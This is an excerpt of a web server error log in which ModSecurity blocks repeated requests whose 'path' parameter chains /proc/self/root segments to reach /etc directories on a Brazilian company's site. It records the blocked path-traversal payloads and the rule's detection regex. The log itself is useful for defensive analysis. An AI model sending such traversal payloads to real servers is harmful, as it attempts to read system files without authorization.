"abz4qOoXxyEfFpUF8f9bdQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:35:07.121789 2026] [mime_magic:error] [pid 11167:tid 140411641214720] (70014)End of file found: [client 57.141.18.60:56770] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 04:35:08.947945 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.241.31:49334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4rDJ3M9BSuKP7CAbpwQAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:35:15.829237 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:34416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4szJ3M9BSuKP7CAbpzQAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:35:19.223034 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.243.128:43442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4t_XLqtnMIWvjpaJxgAAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:35:23.092056 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:41778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4u11pVZ5mVmJwsFMJaQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:35:23.623639 2026] [mime_magic:error] [pid 9818:tid 140411624429312] (70014)End of file found: [client 57.141.18.29:57260] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 04:35:45.725798 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.241.31:34430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz40BCii7xarUs8iHY-dgAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:36:16.365101 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:41788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz48PqxLDW4GITHUkS7IgAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:36:27.940555 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.243.128:38254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4-zJ3M9BSuKP7CAbp-wAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:37:00.864379 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.243.128:44080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5HPHIg5MgXLBnicPT0wAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:37:04.700646 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:60916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5INa6ubjKNq_cu4aoYAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:37:07.058320 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:53302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5I-oXxyEfFpUF8f9bsQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:37:10.554609 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.241.31:60358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5JV1pVZ5mVmJwsFMJkAAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:37:11.709815 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.243.128:56312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5J7ninkcc-iUj5Ao27gAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:37:12.070762 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.241.31:60368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5KBCii7xarUs8iHY-qAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:37:25.921486 2026] [mime_magic:error] [pid 15826:tid 140411607643904] (70014)End of file found: [client 66.249.74.169:54588] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 04:37:30.035603 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.241.31:60372] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5OvHIg5MgXLBnicPT9gAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:37:53.651090 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.243.128:32920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5UfHIg5MgXLBnicPUDwAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:38:00.319575 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.241.31:47532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5WPqxLDW4GITHUkS7eAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:38:05.711528 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:38256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5XQF0L0L-SsrnPo5BbgAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:38:06.418608 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.241.31:51340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5XhCii7xarUs8iHY-ygAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:38:20.098887 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.241.31:60050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5bBCii7xarUs8iHY-4QAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:38:46.687662 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:34694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5hvqxLDW4GITHUkS7qQAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:38:53.183579 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:41316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz5jRCii7xarUs8iHY-9gAAAgo"], referer: 